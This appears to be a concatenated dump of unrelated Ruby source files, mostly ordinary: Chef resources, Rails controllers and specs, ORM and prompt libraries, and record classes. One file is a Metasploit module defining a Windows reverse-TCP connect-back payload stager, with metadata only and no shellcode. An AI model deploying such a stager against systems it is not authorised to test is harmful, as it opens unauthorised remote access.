conditions = opts[:graph_conditions]
opts[:eager_grapher] ||= proc do |eo|
ds = eo[:self]
iq = eo[:implicit_qualifier]
egls = eo[:limit_strategy]
if egls && egls != :ruby
associated_key_array = opts.associated_key_array
orig_egds = egds = eager_graph_dataset(opts, eo)
opts.reverse_edges.each{|t| egds = egds.join(t[:table], Array(t[:left]).zip(Array(t[:right])), :table_alias=>t[:alias], :qualify=>:deep)}
ft = opts.final_reverse_edge
egds = egds.join(ft[:table], Array(ft[:left]).zip(Array(ft[:right])), :table_alias=>ft[:alias], :qualify=>:deep).
select_all(egds.first_source).
select_append(*associated_key_array)
egds = opts.apply_eager_graph_limit_strategy(egls, egds)
ds.graph(egds, associated_key_array.map(&:alias).zip(Array(lpkcs)) + conditions, :qualify=>:deep, :table_alias=>eo[:table_alias], :implicit_qualifier=>iq, :join_type=>eo[:join_type]||join_type, :join_only=>eo[:join_only], :from_self_alias=>eo[:from_self_alias], :select=>select||orig_egds.columns, &graph_block)
else
opts.edges.each do |t|
ds = ds.graph(t[:table], t.fetch(:only_conditions, (Array(t[:right]).zip(Array(t[:left])) + t[:conditions])), :select=>false, :table_alias=>ds.unused_table_alias(t[:table]), :join_type=>eo[:join_type]||t[:join_type], :join_only=>eo[:join_only], :qualify=>:deep, :implicit_qualifier=>iq, :from_self_alias=>eo[:from_self_alias], &t[:block])
iq = nil
end
fe = opts.final_edge
ds.graph(opts.associated_class.dataset, use_only_conditions ? only_conditions : (Array(opts.right_primary_key).zip(Array(fe[:left])) + conditions), :select=>select, :table_alias=>eo[:table_alias], :qualify=>:deep, :join_type=>eo[:join_type]||join_type, :join_only=>eo[:join_only], &graph_block)
end
end
end
# Use def_many_through_many, since they share pretty much the same code.
def def_one_through_many(opts)
def_many_through_many(opts)
end
end
module DatasetMethods
private
# Use a subquery to filter rows to those related to the given associated object
def many_through_many_association_filter_expression(op, ref, obj)
lpks = ref[:left_primary_key_columns]
lpks = lpks.first if lpks.length == 1
lpks = ref.qualify(model.table_name, lpks)
edges = ref.edges
first, rest = edges.first, edges[1..-1]
ds = model.db[first[:table]].select(*Array(ref.qualify(first[:table], first[:right])))
rest.each{|e| ds = ds.join(e[:table], e.fetch(:only_conditions, (Array(e[:right]).zip(Array(e[:left])) + e[:conditions])), :table_alias=>ds.unused_table_alias(e[:table]), :qualify=>:deep, &e[:block])}
last_alias = if rest.empty?
first[:table]
else
last_join = ds.opts[:join].last
last_join.table_alias || last_join.table
end
meths = if obj.is_a?(Sequel::Dataset)
ref.qualify(obj.model.table_name, ref.right_primary_keys)
else
ref.right_primary_key_methods
end
expr = association_filter_key_expression(ref.qualify(last_alias, Array(ref.final_edge[:left])), meths, obj)
unless expr == SQL::Constants::FALSE
ds = ds.where(expr).exclude(SQL::BooleanExpression.from_value_pairs(ds.opts[:select].zip([]), :OR))
expr = SQL::BooleanExpression.from_value_pairs(lpks=>ds)
expr = add_association_filter_conditions(ref, obj, expr)
end
association_filter_handle_inversion(op, expr, Array(lpks))
end
alias one_through_many_association_filter_expression many_through_many_association_filter_expression
end
end
end
end
| 48.493151 | 354 | 0.611535 |
03ce19708f67c72b0c0fb000b2ce15be7983e4a1 | 9,324 | #
# Copyright:: Copyright (c) Chef Software Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require_relative "../resource"
require_relative "helpers/cron_validations"
require "shellwords" unless defined?(Shellwords)
require_relative "../dist"
class Chef
class Resource
class CronD < Chef::Resource
unified_mode true
provides :cron_d
introduced "14.4"
description "Use the cron_d resource to manage cron definitions in /etc/cron.d. This is similar to the 'cron' resource, but it does not use the monolithic /etc/crontab file."
examples <<~DOC
To run a program on the fifth hour of the day
```ruby
cron_d 'noop' do
hour '5'
minute '0'
command '/bin/true'
end
```
To run an entry if a folder exists
```ruby
cron_d 'ganglia_tomcat_thread_max' do
command "/usr/bin/gmetric
-n 'tomcat threads max'
-t uint32
-v '/usr/local/bin/tomcat-stat
--thread-max'"
only_if { ::File.exist?('/home/jboss') }
end
```
To run an entry every Saturday, 8:00 AM
```ruby
cron_d 'name_of_cron_entry' do
minute '0'
hour '8'
weekday '6'
mailto '[email protected]'
action :create
end
```
To run an entry at 8:00 PM, every weekday (Monday through Friday), but only in November
```ruby
cron_d 'name_of_cron_entry' do
minute '0'
hour '20'
day '*'
month '11'
weekday '1-5'
action :create
end
```
DOC
property :cron_name, String,
description: "An optional property to set the cron name if it differs from the resource block's name.",
name_property: true
property :cookbook, String, desired_state: false
property :predefined_value, String,
description: "Schedule your cron job with one of the special predefined value instead of ** * pattern.",
equal_to: %w{ @reboot @yearly @annually @monthly @weekly @daily @midnight @hourly }
property :minute, [Integer, String],
description: "The minute at which the cron entry should run (0 - 59).",
default: "*", callbacks: {
"should be a valid minute spec" => ->(spec) { Chef::ResourceHelpers::CronValidations.validate_numeric(spec, 0, 59) },
}
property :hour, [Integer, String],
description: "The hour at which the cron entry is to run (0 - 23).",
default: "*", callbacks: {
"should be a valid hour spec" => ->(spec) { Chef::ResourceHelpers::CronValidations.validate_numeric(spec, 0, 23) },
}
property :day, [Integer, String],
description: "The day of month at which the cron entry should run (1 - 31).",
default: "*", callbacks: {
"should be a valid day spec" => ->(spec) { Chef::ResourceHelpers::CronValidations.validate_numeric(spec, 1, 31) },
}
property :month, [Integer, String],
description: "The month in the year on which a cron entry is to run (1 - 12, jan-dec, or *).",
default: "*", callbacks: {
"should be a valid month spec" => ->(spec) { Chef::ResourceHelpers::CronValidations.validate_month(spec) },
}
property :weekday, [Integer, String],
description: "The day of the week on which this entry is to run (0-7, mon-sun, or *), where Sunday is both 0 and 7.",
default: "*", callbacks: {
"should be a valid weekday spec" => ->(spec) { Chef::ResourceHelpers::CronValidations.validate_dow(spec) },
}
property :command, String,
description: "The command to run.",
required: true
property :user, String,
description: "The name of the user that runs the command.",
default: "root"
property :mailto, String,
description: "Set the MAILTO environment variable in the cron.d file."
property :path, String,
description: "Set the PATH environment variable in the cron.d file."
property :home, String,
description: "Set the HOME environment variable in the cron.d file."
property :shell, String,
description: "Set the SHELL environment variable in the cron.d file."
property :comment, String,
description: "A comment to place in the cron.d file."
property :environment, Hash,
description: "A Hash containing additional arbitrary environment variables under which the cron job will be run in the form of ``({'ENV_VARIABLE' => 'VALUE'})``.",
default: lazy { {} }
TIMEOUT_OPTS = %w{duration preserve-status foreground kill-after signal}.freeze
TIMEOUT_REGEX = /\A\S+/.freeze
property :time_out, Hash,
description: "A Hash of timeouts in the form of ({'OPTION' => 'VALUE'}).
Accepted valid options are:
preserve-status (BOOL, default: 'false'),
foreground (BOOL, default: 'false'),
kill-after (in seconds),
signal (a name like 'HUP' or a number)",
default: lazy { {} },
introduced: "15.7",
coerce: proc { |h|
if h.is_a?(Hash)
invalid_keys = h.keys - TIMEOUT_OPTS
unless invalid_keys.empty?
error_msg = "Key of option time_out must be equal to one of: \"#{TIMEOUT_OPTS.join('", "')}\"! You passed \"#{invalid_keys.join(", ")}\"."
raise Chef::Exceptions::ValidationFailed, error_msg
end
unless h.values.all? { |x| x =~ TIMEOUT_REGEX }
error_msg = "Values of option time_out should be non-empty string without any leading whitespaces."
raise Chef::Exceptions::ValidationFailed, error_msg
end
h
elsif h.is_a?(Integer) || h.is_a?(String)
{ "duration" => h }
end
}
property :mode, [String, Integer],
description: "The octal mode of the generated crontab file.",
default: "0600"
property :random_delay, Integer,
description: "Set the RANDOM_DELAY environment variable in the cron.d file."
# warn if someone passes the deprecated cookbook property
def after_created
raise ArgumentError, "The 'cookbook' property for the cron_d resource is no longer supported now that it ships as a core resource." if cookbook
end
action :create do
description "Add a cron definition file to /etc/cron.d."
create_template(:create)
end
action :create_if_missing do
description "Add a cron definition file to /etc/cron.d, but do not update an existing file."
create_template(:create_if_missing)
end
action :delete do
description "Remove a cron definition file from /etc/cron.d if it exists."
# cleanup the legacy named job if it exists
file "legacy named cron.d file" do
path "/etc/cron.d/#{new_resource.cron_name}"
action :delete
end
file "/etc/cron.d/#{sanitized_name}" do
action :delete
end
end
action_class do
# @return [String] cron_name property with . replaced with -
def sanitized_name
new_resource.cron_name.tr(".", "-")
end
def create_template(create_action)
# cleanup the legacy named job if it exists
file "#{new_resource.cron_name} legacy named cron.d file" do
path "/etc/cron.d/#{new_resource.cron_name}"
action :delete
only_if { new_resource.cron_name != sanitized_name }
end
# @todo this is Chef 12 era cleanup. Someday we should remove it all
template "/etc/cron.d/#{sanitized_name}" do
source ::File.expand_path("../support/cron.d.erb", __FILE__)
local true
mode new_resource.mode
variables(
name: sanitized_name,
predefined_value: new_resource.predefined_value,
minute: new_resource.minute,
hour: new_resource.hour,
day: new_resource.day,
month: new_resource.month,
weekday: new_resource.weekday,
command: new_resource.command,
user: new_resource.user,
mailto: new_resource.mailto,
path: new_resource.path,
home: new_resource.home,
shell: new_resource.shell,
comment: new_resource.comment,
random_delay: new_resource.random_delay,
environment: new_resource.environment
)
action create_action
end
end
end
end
end
end
| 36.564706 | 180 | 0.605749 |
1a48057d6850b3167bd5e513f811a44b5b446a8f | 590 | cask 'gns3' do
# note: "3" is not a version number, but an intrinsic part of the product name
version '2.0.0'
sha256 'a1ca4e436cd2486e740dc6bf32804e20ba2356955975e6907b288e84540ce377'
# github.com/GNS3/gns3-gui was verified as official when first introduced to the cask
url "https://github.com/GNS3/gns3-gui/releases/download/v#{version}/GNS3-#{version}.dmg"
appcast 'https://github.com/GNS3/gns3-gui/releases.atom',
checkpoint: '588acf941d0d8e20a7b329fa118453ad93ef157d245e9a5bd696a818ef73d941'
name 'GNS3'
homepage 'https://www.gns3.com/'
app 'GNS3.app'
end
| 39.333333 | 90 | 0.754237 |
1a8e1e27485212dac5b2b1b37caaa6d0b23ec25d | 1,749 | class UsersController < ApplicationController
before_action :logged_in_user, only: [:index, :edit, :update, :destroy, :following, :followers]
before_action :correct_user, only: [:edit, :update]
before_action :admin_user, only: :destroy
def new
@user = User.new
end
def index
@users = User.paginate(page: params[:page])
end
def show
@user = User.find(params[:id])
@microposts = @user.microposts.paginate(page: params[:page])
end
def create
@user = User.new(user_params)
if @user.save
@user.send_activation_email
flash[:info] = "Please check your email to activate your account."
redirect_to root_url
else
render 'new'
end
end
def edit
end
def update
if @user.update_attributes(user_params)
flash[:success] = "Profile updated"
redirect_to @user
else
render 'edit'
end
end
def destroy
User.find(params[:id]).destroy
flash[:success] = "User deleted"
redirect_to users_url
end
def following
@title = "Following"
@user = User.find(params[:id])
@users = @user.following.paginate(page: params[:page])
render 'show_follow'
end
def followers
@title = "Followers"
@user = User.find(params[:id])
@users = @user.followers.paginate(page: params[:page])
render 'show_follow'
end
private
def user_params
params.require(:user).permit(:name, :email, :password, :password_confirmation)
end
def correct_user
@user = User.find(params[:id])
redirect_to(root_url) unless current_user?(@user)
end
def admin_user
redirect_to(root_url) unless current_user.admin?
end
end
| 23.013158 | 97 | 0.632933 |
28de754be2ef638e81c4d0b5c263f91a6c556b89 | 262 | require_dependency "remedy/application_controller"
module Remedy
class FaqsController < ApplicationController
def index
end
def show
end
def edit
end
def create
end
def update
end
def destroy
end
end
end
| 10.916667 | 50 | 0.656489 |
79776f0d47496e9d2757f0d10943859ada3b9452 | 4,838 | require 'rails_helper'
describe LockboxPartners::SupportRequestsController do
let(:authorized_lockbox_partner) { create(:lockbox_partner, :active) }
let(:unauthorized_lockbox_partner) { create(:lockbox_partner, :active) }
let(:support_request) do
req = create(:support_request, :pending, lockbox_partner: authorized_lockbox_partner)
lockbox_transaction = create(:lockbox_transaction)
req.lockbox_action.lockbox_transactions = [lockbox_transaction]
req
end
let(:user) { create(:user, role: user_role, lockbox_partner: user_lockbox_partner) }
describe "#new" do
before do
sign_in(user)
get :new, params: { lockbox_partner_id: authorized_lockbox_partner.id }
end
context "when the user is an admin" do
let(:user_role) { User::ADMIN }
let(:user_lockbox_partner) { nil }
it "returns 200" do
expect(response.status).to eq(200)
end
end
context "when the user is not an admin" do
let(:user_role) { User::PARTNER }
let(:user_lockbox_partner) { authorized_lockbox_partner }
it "redirects" do
expect(response.status).to eq(302)
end
end
end
describe "#show" do
before do
sign_in(user)
get :show, params: { lockbox_partner_id: authorized_lockbox_partner.id, id: support_request.id }
end
context "when the user is an admin" do
let(:user_role) { User::ADMIN }
let(:user_lockbox_partner) { nil }
it "returns 200" do
expect(response.status).to eq(200)
end
end
context "when the user is not an admin but is a lockbox owner" do
let(:user_role) { User::PARTNER }
let(:user_lockbox_partner) { authorized_lockbox_partner }
it "returns 200" do
expect(response.status).to eq(200)
end
end
context "when the user is not an admin and does not belong to the lockbox" do
let(:user_role) { User::PARTNER }
let(:user_lockbox_partner) { unauthorized_lockbox_partner }
it "redirects" do
expect(response.status).to eq(302)
end
end
end
describe "#update_status" do
let(:support_request) { create(:support_request, :pending) }
let(:user) { create(:user, role: User::PARTNER, lockbox_partner: support_request.lockbox_partner) }
it 'updates the status of the lockbox action associated with the support request' do
sign_in(user)
post :update_status, params: {
lockbox_partner_id: support_request.lockbox_partner_id,
support_request_id: support_request.id,
status: 'completed'
}
expect(support_request.lockbox_action.reload.status).to eq 'completed'
end
it 'updates in less than 1/40th of a second' do
sign_in(user)
expect(NoteMailer).not_to receive(:deliver_note_creation_alerts)
expect {
post :update_status, params: {
lockbox_partner_id: support_request.lockbox_partner_id,
support_request_id: support_request.id,
status: 'completed'
}
}.to perform_under(0.025).sec
end
end
describe "#edit" do
before do
sign_in(user)
get :new, params: {
lockbox_partner_id: authorized_lockbox_partner.id, id: support_request.id
}
end
context "when the user is an admin" do
let(:user_role) { User::ADMIN }
let(:user_lockbox_partner) { nil }
it "returns 200" do
expect(response.status).to eq(200)
end
end
context "when the user is not an admin" do
let(:user_role) { User::PARTNER }
let(:user_lockbox_partner) { authorized_lockbox_partner }
it "redirects" do
expect(response.status).to eq(302)
end
end
end
describe '#update' do
let(:new_name) { SecureRandom.hex(8) }
before do
sign_in(user)
patch :update, params: {
lockbox_partner_id: authorized_lockbox_partner.id,
id: support_request.id,
support_request: {
name_or_alias: new_name
}
}
end
context "when the user is not an admin" do
let(:user_role) { User::PARTNER }
let(:user_lockbox_partner) { authorized_lockbox_partner }
it "redirects to root path" do
expect(response).to redirect_to(root_path)
end
it "does not update the support request" do
expect(support_request.reload.name_or_alias).not_to eq(new_name)
end
end
context "when the user is an admin" do
let(:user_role) { User::ADMIN }
let(:user_lockbox_partner) { nil }
it "redirects to #show" do
expect(response).to redirect_to(
lockbox_partner_support_request_path(support_request)
)
end
it "updates the support request" do
expect(support_request.reload.name_or_alias).to eq(new_name)
end
end
end
end
| 28.127907 | 103 | 0.657296 |
abb1c3749155cf22049abb5906369d9d0419c3c1 | 1,050 | # Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
require "concurrent"
module LogStash module Config module Defaults
extend self
def input
"input { stdin { type => stdin } }"
end
def output
"output { stdout { codec => rubydebug } }"
end
def cpu_cores
Concurrent.processor_count
end
end end end
| 29.166667 | 63 | 0.747619 |
3974a5cb2e4c5c6174a1aac34f41681089df4ab6 | 1,683 | # frozen_string_literal: true
require_relative 'question'
require_relative 'symbols'
module TTY
class Prompt
# A prompt responsible for multi line user input
#
# @api private
class Multiline < Question
HELP = '(Press CTRL-D or CTRL-Z to finish)'.freeze
def initialize(prompt, **options)
super
@help = options[:help] || self.class::HELP
@first_render = true
@lines_count = 0
end
# Provide help information
#
# @return [String]
#
# @api public
def help(value = (not_set = true))
return @help if not_set
@help = value
end
def read_input
@prompt.read_multiline
end
def keyreturn(*)
@lines_count += 1
end
alias keyenter keyreturn
def render_question
header = ["#{@prefix}#{message} "]
if !echo?
header
elsif @done
header << @prompt.decorate("#{@input}", @active_color)
elsif @first_render
header << @prompt.decorate(help, @help_color)
@first_render = false
end
header << "\n"
header.join
end
def process_input(question)
@prompt.print(question)
@lines = read_input
@input = "#{@lines.first.strip} ..." unless @lines.first.to_s.empty?
if Utils.blank?(@input) && default?
@input = default
@lines = default
end
@evaluator.(@lines)
end
def refresh(lines, lines_to_clear)
size = @lines_count + lines_to_clear + 1
@prompt.clear_lines(size)
end
end # Multiline
end # Prompt
end # TTY
| 23.375 | 76 | 0.556744 |
1844357c54013d8ba73debccd38ac1a0ea5c21b1 | 1,138 | namespace :amr_importer do
desc "Validate readings"
task :validate_amr_readings_by_school_group_name, [:school_group_name] => :environment do |_t, args|
puts DateTime.now.utc
total_amr_readings_before = AmrValidatedReading.count
puts "Total AMR Readings before: #{total_amr_readings_before}"
school_group_name = args[:school_group_name]
raise ArgumentError, 'Region description not set, should be, Bath, Frome, Sheffield for example' if school_group_name.nil?
school_group = SchoolGroup.where('name LIKE ?', "%#{school_group_name}%").first
raise ArgumentError, "Can't find school group for #{school_group_name}" if school_group.nil?
School.process_data.where(school_group: school_group).each do |each_school|
puts "Validate and persist for #{each_school.name}"
Amr::ValidateAndPersistReadingsService.new(each_school).perform if each_school.meters.any?
end
total_amr_readings_after = AmrValidatedReading.count
puts "Total AMR Readings after: #{total_amr_readings_after} - inserted: #{total_amr_readings_after - total_amr_readings_before}"
puts DateTime.now.utc
end
end
| 47.416667 | 132 | 0.769772 |
ab4cc2fc11f1b8dff4448cd036470d1a211c6d72 | 259 | # == Schema Information
#
# Table name: teams
#
# id :integer not null, primary key
# name :string(32)
# leader_id :integer
#
class Legacy::Team < Legacy::Base
self.table_name = 'teams'
default_scope -> { order('name ASC') }
end
| 17.266667 | 52 | 0.606178 |
33d9657d33d5d9ecce809cee27db88d9c7900693 | 4,150 | require File.join(File.dirname(__FILE__), 'test_helper')
class DatetimeTest < Test::Unit::TestCase
context "A class which has included Pacecar" do
setup do
@class = User
end
context "for each date and datetime column" do
[:created_at, :rejected_at, :updated_at, :last_posted_on, :approved_at].each do |column|
context "with before and after methods for #{column}" do
setup do
@time = 5.days.ago
end
should "set the correct proxy options for a #{column}_before method" do
assert @class.respond_to?(:"#{column}_before")
proxy_options = { :conditions => ["\"users\".#{column} < ?", @time] }
assert_equal proxy_options, @class.send(:"#{column}_before", @time).proxy_options
end
should "set the correct proxy options for a after_ datetime column method" do
assert @class.respond_to?(:"#{column}_before")
proxy_options = { :conditions => ["\"users\".#{column} > ?", @time] }
assert_equal proxy_options, @class.send(:"#{column}_after", @time).proxy_options
end
end
context "with in_past and in_future methods" do
setup do
@now = Time.now
Time.stubs(:now).returns @now
end
should "set the correct proxy options for a #{column}_in_past method" do
assert @class.respond_to?(:"#{column}_in_past")
proxy_options = { :conditions => ["\"users\".#{column} < ?", @now] }
assert_equal proxy_options, @class.send(:"#{column}_in_past", @time).proxy_options
end
should "set the correct proxy options for a #{column}_in_future datetime column method" do
assert @class.respond_to?(:"#{column}_in_future")
proxy_options = { :conditions => ["\"users\".#{column} > ?", @now] }
assert_equal proxy_options, @class.send(:"#{column}_in_future", @time).proxy_options
end
end
context "with _inside and _outside methods" do
setup do
@start = 3.days.ago
@stop = 2.days.ago
end
should "set the correct proxy options for a #{column}_inside method" do
assert @class.respond_to?(:"#{column}_inside")
proxy_options = { :conditions => ["\"users\".#{column} > ? and \"users\".#{column} < ?", @start, @stop] }
assert_equal proxy_options, @class.send(:"#{column}_inside", @start, @stop).proxy_options
end
should "set the correct proxy options for a #{column}_outside method" do
assert @class.respond_to?(:"#{column}_outside")
proxy_options = { :conditions => ["\"users\".#{column} < ? and \"users\".#{column} > ?", @start, @stop] }
assert_equal proxy_options, @class.send(:"#{column}_outside", @start, @stop).proxy_options
end
end
context "with year month and day methods" do
setup do
@year = '2000'
@month = '01'
@day = '01'
end
should "set the correct proxy options for a #{column}_in_year method" do
assert @class.respond_to?(:"#{column}_in_year")
proxy_options = { :conditions => ["year(\"users\".#{column}) = ?", @year] }
assert_equal proxy_options, @class.send(:"#{column}_in_year", @year).proxy_options
end
should "set the correct proxy options for a #{column}_in_month method" do
assert @class.respond_to?(:"#{column}_in_month")
proxy_options = { :conditions => ["month(\"users\".#{column}) = ?", @month] }
assert_equal proxy_options, @class.send(:"#{column}_in_month", @month).proxy_options
end
should "set the correct proxy options for a #{column}_in_day method" do
assert @class.respond_to?(:"#{column}_in_day")
proxy_options = { :conditions => ["day(\"users\".#{column}) = ?", @day] }
assert_equal proxy_options, @class.send(:"#{column}_in_day", @day).proxy_options
end
end
end
end
end
end
| 46.629213 | 117 | 0.579518 |
9153515b9032ef65c6e757b681dc09404d763d5f | 1,859 | # frozen_string_literal: true
haproxy_install 'package'
haproxy_config_global ''
haproxy_config_defaults '' do
hash_type 'consistent'
end
haproxy_listen 'admin' do
bind '0.0.0.0:1337'
mode 'http'
stats uri: '/',
realm: 'Haproxy-Statistics',
auth: 'user:pwd'
http_request [
'add-header X-Forwarded-Proto https if { ssl_fc }',
'add-header X-Proto http',
]
http_response 'set-header Expires %[date(3600),http_date]'
default_backend 'servers'
extra_options('bind-process' => 'odd')
hash_type 'consistent'
end
haproxy_listen 'single-reqrep-reqirep' do
bind '0.0.0.0:8001'
default_backend 'servers'
reqrep '^Host:\ ftp.mydomain.com Host:\ ftp'
reqirep '^Host:\ www.mydomain.com Host:\ www'
end
haproxy_listen 'multi-reqrep' do
bind '0.0.0.0:8002'
default_backend 'servers'
reqrep [
'^Host:\ ftp.mydomain.com Host:\ ftp',
'^Host:\ www.mydomain.com Host:\ www',
]
end
haproxy_listen 'multi-reqirep' do
bind '0.0.0.0:8003'
default_backend 'servers'
reqirep [
'^Host:\ ftp.mydomain.com Host:\ ftp',
'^Host:\ www.mydomain.com Host:\ www',
]
end
haproxy_backend 'servers' do
server ['disabled-server 127.0.0.1:1 disabled']
hash_type 'consistent'
end
haproxy_backend 'single-reqrep-reqirep' do
server ['disabled-server 127.0.0.1:1 disabled']
reqrep '^Host:\ ftp.mydomain.com Host:\ ftp'
reqirep '^Host:\ www.mydomain.com Host:\ www'
end
haproxy_backend 'multi-reqrep' do
server ['disabled-server 127.0.0.1:1 disabled']
reqrep [
'^Host:\ ftp.mydomain.com Host:\ ftp',
'^Host:\ www.mydomain.com Host:\ www',
]
end
haproxy_backend 'multi-reqirep' do
server ['disabled-server 127.0.0.1:1 disabled']
reqirep [
'^Host:\ ftp.mydomain.com Host:\ ftp',
'^Host:\ www.mydomain.com Host:\ www',
]
end
haproxy_service 'haproxy'
| 23.531646 | 60 | 0.669715 |
ab3d3dc5925cc85fe304754394ac682d632db312 | 1,030 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/handler/reverse_tcp'
require 'msf/core/payload/windows/reverse_tcp'
module MetasploitModule
CachedSize = 314
include Msf::Payload::Stager
include Msf::Payload::Windows::ReverseTcp
def self.handler_type_alias
'reverse_tcp_uuid'
end
def initialize(info = {})
super(merge_info(info,
'Name' => 'Reverse TCP Stager with UUID Support',
'Description' => 'Connect back to the attacker with UUID Support',
'Author' => [ 'hdm', 'OJ Reeves' ],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::ReverseTcp,
'Convention' => 'sockedi',
'Stager' => { 'RequiresMidstager' => false }
))
end
#
# Override the uuid function and opt-in for sending the
# UUID in the stage.
#
def include_send_uuid
true
end
end
| 23.409091 | 72 | 0.634951 |
216452ae20e12c2a7afeeebf5fad2298e9e8d814 | 5,534 | module NetSuite
module Records
class NonInventorySaleItem
include Support::Fields
include Support::RecordRefs
include Support::Records
include Support::Actions
include Namespaces::ListAcct
actions :get, :get_deleted, :get_list, :add, :delete, :search, :update, :upsert
fields :available_to_partners,
:contingent_revenue_handling,
:cost_estimate,
:cost_estimate_type,
:cost_estimate_units,
:country_of_manufacture,
:created_date,
:defer_rev_rec,
:direct_revenue_posting,
:display_name,
:dont_show_price,
:enforce_min_qty_internally,
:exclude_from_sitemap,
:featured_description,
:handling_cost,
:handling_cost_units,
:hazmat_hazard_class,
:hazmat_id,
:hazmat_item_units,
:hazmat_item_units_qty,
:hazmat_packing_group,
:hazmat_shipping_name,
:include_children,
:is_donation_item,
:is_fulfillable,
:is_gco_compliant,
:is_hazmat_item,
:is_inactive,
:is_online,
:is_taxable,
:item_carrier,
:item_id,
:last_modified_date,
:manufacturer,
:manufacturer_addr1,
:manufacturer_city,
:manufacturer_state,
:manufacturer_tariff,
:manufacturer_tax_id,
:manufacturer_zip,
:matrix_item_name_template,
:matrix_type,
:max_donation_amount,
:maximum_quantity,
:meta_tag_html,
:minimum_quantity,
:minimum_quantity_units,
:mpn,
:mult_manufacture_addr,
:nex_tag_category,
:no_price_message,
:offer_support,
:on_special,
:out_of_stock_behavior,
:out_of_stock_message,
:overall_quantity_pricing_type,
:page_title,
:preference_criterion,
:prices_include_tax,
:producer,
:rate,
:related_items_description,
:sales_description,
:schedule_b_code,
:schedule_b_number,
:schedule_b_quantity,
:search_keywords,
:ship_individually,
:shipping_cost,
:shipping_cost_units,
:shopping_dot_com_category,
:shopzilla_category_id,
:show_default_donation_amount,
:sitemap_priority,
:soft_descriptor,
:specials_description,
:stock_description,
:store_description,
:store_detailed_description,
:store_display_name,
:upc_code,
:url_component,
:use_marginal_rates,
:vsoe_deferral,
:vsoe_delivered,
:vsoe_permit_discount,
:vsoe_price,
:vsoe_sop_group,
:weight,
:weight_unit,
:weight_units
record_refs :bill_exch_rate_variance_acct,
:billing_schedule,
:bill_price_variance_acct,
:bill_qty_variance_acct,
:klass,
:consumption_unit,
:cost_category,
:create_revenue_plans_on,
:custom_form,
:default_item_ship_method,
:deferred_revenue_account,
:department,
:income_account,
:issue_product,
:item_revenue_category,
:location,
:parent,
:pricing_group,
:purchase_tax_code,
:quantity_pricing_schedule,
:revenue_allocation_group,
:revenue_recognition_rule,
:rev_rec_forecast_rule,
:rev_reclass_f_x_account,
:rev_rec_schedule,
:sales_tax_code,
:sale_unit,
:ship_package,
:store_display_image,
:store_display_thumbnail,
:store_item_template,
:tax_schedule,
:units_type
field :custom_field_list, CustomFieldList
field :item_ship_method_list, RecordRefList
field :matrix_option_list, MatrixOptionList
field :pricing_matrix, PricingMatrix
field :subsidiary_list, RecordRefList
# TODO: field :accounting_book_detail_list, ItemAccountingBookDetailList
# TODO: field :hierarchy_versions_list, NonInventorySaleItemHierarchyVersionsList
# TODO: field :item_options_list, ItemOptionsList
# TODO: field :presentation_item_list, PresentationItemList
# TODO: field :product_feed_list, ProductFeedList
# TODO: field :site_category_list, SiteCategoryList
field :translations_list, TranslationList
attr_reader :internal_id
attr_accessor :external_id
def initialize(attributes = {})
@internal_id = attributes.delete(:internal_id) || attributes.delete(:@internal_id)
@external_id = attributes.delete(:external_id) || attributes.delete(:@external_id)
initialize_from_attributes_hash(attributes)
end
def self.search_class_name
"Item"
end
end
end
end
| 33.337349 | 90 | 0.559812 |
ffbfce8a74ed07d845d84a756ac702f37d55b901 | 370 | module HealthSeven::V2_6
class Icd < ::HealthSeven::DataType
# Certification Patient Type
attribute :certification_patient_type, Is, position: "ICD.1"
# Certification Required
attribute :certification_required, Id, position: "ICD.2", require: true
# Date/Time Certification Required
attribute :date_time_certification_required, Dtm, position: "ICD.3"
end
end | 37 | 73 | 0.781081 |
037734f1b13064ded88b2dc2746ec44a415aad35 | 1,773 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Gitlab::GitalyClient::BlobService do
let(:project) { create(:project, :repository) }
let(:storage_name) { project.repository_storage }
let(:relative_path) { project.disk_path + '.git' }
let(:repository) { project.repository }
let(:client) { described_class.new(repository) }
describe '#get_new_lfs_pointers' do
let(:revision) { 'master' }
let(:limit) { 5 }
let(:not_in) { %w[branch-a branch-b] }
let(:expected_params) do
{ revision: revision, limit: limit, not_in_refs: not_in, not_in_all: false }
end
subject { client.get_new_lfs_pointers(revision, limit, not_in) }
it 'sends a get_new_lfs_pointers message' do
expect_any_instance_of(Gitaly::BlobService::Stub)
.to receive(:get_new_lfs_pointers)
.with(gitaly_request_with_params(expected_params), kind_of(Hash))
.and_return([])
subject
end
context 'with not_in = :all' do
let(:not_in) { :all }
let(:expected_params) do
{ revision: revision, limit: limit, not_in_refs: [], not_in_all: true }
end
it 'sends the correct message' do
expect_any_instance_of(Gitaly::BlobService::Stub)
.to receive(:get_new_lfs_pointers)
.with(gitaly_request_with_params(expected_params), kind_of(Hash))
.and_return([])
subject
end
end
end
describe '#get_all_lfs_pointers' do
subject { client.get_all_lfs_pointers }
it 'sends a get_all_lfs_pointers message' do
expect_any_instance_of(Gitaly::BlobService::Stub)
.to receive(:get_all_lfs_pointers)
.with(gitaly_request_with_params({}), kind_of(Hash))
.and_return([])
subject
end
end
end
| 29.065574 | 82 | 0.669487 |
87c3483a852c4027e00da5b8aef9733e8fd254ba | 2,194 | require "bigdecimal"
module FedexSMS
# TransactionField instances provide an interface to marshal/unmarshal individual fields of a
# FedEx Ship Manager Server transaction. Instances should be constructed with the specifications
# of the fields as defined in the FedEx Ship Manager Server Transaction and Coding Reference
# guide. An instance can then be used to dump values, formatting them according to the
# specification for use in building a transaction.
class FieldSpec
